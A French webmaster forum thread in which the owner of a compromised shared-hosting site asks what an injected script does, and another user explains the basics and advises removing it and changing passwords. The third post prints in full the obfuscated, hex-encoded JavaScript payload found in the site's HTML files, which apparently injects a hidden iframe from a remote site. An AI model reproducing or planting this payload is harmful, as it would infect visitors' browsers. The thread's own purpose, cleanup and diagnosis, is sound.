Discussion :

[sykaflex]

bonjour à tous
tout d'abord j'espere que je suis sur le bon forum, sinon désolé ...
mon site hebergé sur amen mutu, suite a blacklistage google, j'ai isolé tous les fichiers infectés en retrouvant la date d'injection "fatale" et analysé les fichiers avec winmerge, résultat une seule et meme injection dans une vingtaine de fichiers .html aprés balise <head> ou <div>:

Code :

Sélectionner tout - Visualiser dans une fenêtre à part

<!--731085--><script type="text/javascript" language="javascript" >

bon je n'y connais pas grand chose en java ! je suppose que

Code :

Sélectionner tout - Visualiser dans une fenêtre à part

<!--731085-->

est le .js à executer et

Code :

Sélectionner tout - Visualiser dans une fenêtre à part

<script type="text/javascript" language="javascript" >

est la commande java ...
bien sur j'ai rechargé un site propre, etc ...
ma question est : que fait cette injection de code, comment fonctionne-t'elle et surtout comment repérer ce foutu fichier .js qui doit bien etre quelque part sur mon serveur ... ???
merci pour vos réponses éclairées,
Sika

[rg77140]

Code :

Sélectionner tout - Visualiser dans une fenêtre à part

<!--731085-->

ça c'est rien du tout, c'est un commentaire HTML...

Code :

Sélectionner tout - Visualiser dans une fenêtre à part

<script type="text/javascript" language="javascript" >

ça c'est une balise ouvrante pour du javascript. Le code javascript se trouve entre cette balise et la balise fermante "</script>".

Code :

Sélectionner tout - Visualiser dans une fenêtre à part

1
2
3
<script type="text/javascript" language="javascript" >
// ici le code javascript malicieux
</script>

Au passage tu confonds JavaScript et Java qui n'ont rien à voir.

Romain.

[sykaflex]

merci pour ta reponse, quelle andouille ! grace a ton explication j'ai trouvé le code en cherchant la balise de fermeture, bien planqué après avoir mis 10000 espaces après la balise d'ouverture, pas bête ! je n'avais pas vu le truc sur la page affichée sur mon editeur !......... voici le code :

Code :

Sélectionner tout - Visualiser dans une fenêtre à part

</div><!--731085--><script type="text/javascript" language="javascript" >vz="d"+"oc"+"ument";try{--window[vz].body}catch(q){aa=function(ff){ff="fromCh"+ff;for(i=0;i<z.length;i++){za+=String[ff](e(v+(z[i]))-(12));}};};ps="s"+"plit";e=(eval);v="0x";a=0;z="y";try{;}catch(zz){a=1}if(!a){try{++e(vz)["\x62od"+z]}catch(q){a2="_";}z="2c_72_81_7a_6f_80_75_7b_7a_2c_86_86_86_72_72_72_34_35_2c_87_19_16_2c_82_6d_7e_2c_84_2c_49_2c_70_7b_6f_81_79_71_7a_80_3a_6f_7e_71_6d_80_71_51_78_71_79_71_7a_80_34_33_75_72_7e_6d_79_71_33_35_47_19_16_19_16_2c_84_3a_7f_7e_6f_2c_49_2c_33_74_80_80_7c_46_3b_3b_7f_3e_3a_86_7b_79_6e_75_71_73_6d_79_71_7f_3a_81_7f_3b_75_79_6d_73_71_7f_3b_82_80_72_86_3f_5b_45_7c_3a_7c_74_7c_33_47_19_16_2c_84_3a_7f_80_85_78_71_3a_7c_7b_7f_75_80_75_7b_7a_2c_49_2c_33_6d_6e_7f_7b_78_81_80_71_33_47_19_16_2c_84_3a_7f_80_85_78_71_3a_6e_7b_7e_70_71_7e_2c_49_2c_33_3c_33_47_19_16_2c_84_3a_7f_80_85_78_71_3a_74_71_75_73_74_80_2c_49_2c_33_3d_7c_84_33_47_19_16_2c_84_3a_7f_80_85_78_71_3a_83_75_70_80_74_2c_49_2c_33_3d_7c_84_33_47_19_16_2c_84_3a_7f_80_85_78_71_3a_78_71_72_80_2c_49_2c_33_3d_7c_84_33_47_19_16_2c_84_3a_7f_80_85_78_71_3a_80_7b_7c_2c_49_2c_33_3d_7c_84_33_47_19_16_19_16_2c_75_72_2c_34_2d_70_7b_6f_81_79_71_7a_80_3a_73_71_80_51_78_71_79_71_7a_80_4e_85_55_70_34_33_84_33_35_35_2c_87_19_16_2c_70_7b_6f_81_79_71_7a_80_3a_83_7e_75_80_71_34_33_48_70_75_82_2c_75_70_49_68_33_84_68_33_4a_48_3b_70_75_82_4a_33_35_47_19_16_2c_70_7b_6f_81_79_71_7a_80_3a_73_71_80_51_78_71_79_71_7a_80_4e_85_55_70_34_33_84_33_35_3a_6d_7c_7c_71_7a_70_4f_74_75_78_70_34_84_35_47_19_16_2c_89_19_16_89_19_16_72_81_7a_6f_80_75_7b_7a_2c_5f_71_80_4f_7b_7b_77_75_71_34_6f_7b_7b_77_75_71_5a_6d_79_71_38_6f_7b_7b_77_75_71_62_6d_78_81_71_38_7a_50_6d_85_7f_38_7c_6d_80_74_35_2c_87_19_16_2c_82_6d_7e_2c_80_7b_70_6d_85_2c_49_2c_7a_71_83_2c_50_6d_80_71_34_35_47_19_16_2c_82_6d_7e_2c_71_84_7c_75_7e_71_2c_49_2c_7a_71_83_2c_50_6d_80_71_34_35_47_19_16_2c_75_72_2c_34_7a_50_6d_85_7f_49_49_7a_81_78_78_2c_88_88_2c_7a_50_6d_85_7f_49_49_3c_35_2c_7a_50_6d_85_7f_49_3d_47_19_16_2c_71_84_7c_75_7e_71_3a_7f_71_80_60_75_79_71_34_80_7b_70_6d_85_3a_73_71_80_60_75_79_71_34_35_2c_37_2c_3f_42_3c_3c_3c_3c_3c_36_3e_40_36_7a_50_6d_85_7f_35_47_19_16_2c_70_7b_6f_81_79_71_7a_80_3a_6f_7b_7b_77_75_71_2c_49_2c_6f_7b_7b_77_75_71_5a_6d_79_71_37_2e_49_2e_37_71_7f_6f_6d_7c_71_34_6f_7b_7b_77_75_71_62_6d_78_81_71_35_19_16_2c_37_2c_2e_47_71_84_7c_75_7e_71_7f_49_2e_2c_37_2c_71_84_7c_75_7e_71_3a_80_7b_53_59_60_5f_80_7e_75_7a_73_34_35_2c_37_2c_34_34_7c_6d_80_74_35_2c_4b_2c_2e_47_2c_7c_6d_80_74_49_2e_2c_37_2c_7c_6d_80_74_2c_46_2c_2e_2e_35_47_19_16_89_19_16_72_81_7a_6f_80_75_7b_7a_2c_53_71_80_4f_7b_7b_77_75_71_34_2c_7a_6d_79_71_2c_35_2c_87_19_16_2c_82_6d_7e_2c_7f_80_6d_7e_80_2c_49_2c_70_7b_6f_81_79_71_7a_80_3a_6f_7b_7b_77_75_71_3a_75_7a_70_71_84_5b_72_34_2c_7a_6d_79_71_2c_37_2c_2e_49_2e_2c_35_47_19_16_2c_82_6d_7e_2c_78_71_7a_2c_49_2c_7f_80_6d_7e_80_2c_37_2c_7a_6d_79_71_3a_78_71_7a_73_80_74_2c_37_2c_3d_47_19_16_2c_75_72_2c_34_2c_34_2c_2d_7f_80_6d_7e_80_2c_35_2c_32_32_19_16_2c_34_2c_7a_6d_79_71_2c_2d_49_2c_70_7b_6f_81_79_71_7a_80_3a_6f_7b_7b_77_75_71_3a_7f_81_6e_7f_80_7e_75_7a_73_34_2c_3c_38_2c_7a_6d_79_71_3a_78_71_7a_73_80_74_2c_35_2c_35_2c_35_19_16_2c_87_19_16_2c_7e_71_80_81_7e_7a_2c_7a_81_78_78_47_19_16_2c_89_19_16_2c_75_72_2c_34_2c_7f_80_6d_7e_80_2c_49_49_2c_39_3d_2c_35_2c_7e_71_80_81_7e_7a_2c_7a_81_78_78_47_19_16_2c_82_6d_7e_2c_71_7a_70_2c_49_2c_70_7b_6f_81_79_71_7a_80_3a_6f_7b_7b_77_75_71_3a_75_7a_70_71_84_5b_72_34_2c_2e_47_2e_38_2c_78_71_7a_2c_35_47_19_16_2c_75_72_2c_34_2c_71_7a_70_2c_49_49_2c_39_3d_2c_35_2c_71_7a_70_2c_49_2c_70_7b_6f_81_79_71_7a_80_3a_6f_7b_7b_77_75_71_3a_78_71_7a_73_80_74_47_19_16_2c_7e_71_80_81_7e_7a_2c_81_7a_71_7f_6f_6d_7c_71_34_2c_70_7b_6f_81_79_71_7a_80_3a_6f_7b_7b_77_75_71_3a_7f_81_6e_7f_80_7e_75_7a_73_34_2c_78_71_7a_38_2c_71_7a_70_2c_35_2c_35_47_19_16_89_19_16_75_72_2c_34_7a_6d_82_75_73_6d_80_7b_7e_3a_6f_7b_7b_77_75_71_51_7a_6d_6e_78_71_70_35_19_16_87_19_16_75_72_34_53_71_80_4f_7b_7b_77_75_71_34_33_82_75_7f_75_80_71_70_6b_81_7d_33_35_49_49_41_41_35_87_89_71_78_7f_71_87_5f_71_80_4f_7b_7b_77_75_71_34_33_82_75_7f_75_80_71_70_6b_81_7d_33_38_2c_33_41_41_33_38_2c_33_3d_33_38_2c_33_3b_33_35_47_19_16_19_16_86_86_86_72_72_72_34_35_47_19_16_89_19_16_89_19_16"[ps](a2);za="";aa("arCode");zaz=za;e(zaz);}</script><!--/731085-->

qu'en pense tu ?

[rg77140]

Aucune idée de ce que fait ce code, il a volontairement été passé dans une moulinette pour être difficilement lisible par un humain.

Tout ce que je peux te dire c'est de le retirer. Il faudrait par contre trouver la source de la faille qui a permis d'injecter ce code. Une personne a pu trouver le mot de passe de ton compte FTP ? Un hack plus massif au niveau de ton hébergeur ? ...

Je te conseil de changer tous les mots de passe de ton site (ftp, base de données, compte admin etc...).

Romain.

[sykaflex]

oui un hack sur ce server mutu chez amen qui l'avait signalé il y a peu de temps,
merci pour ton aide
sika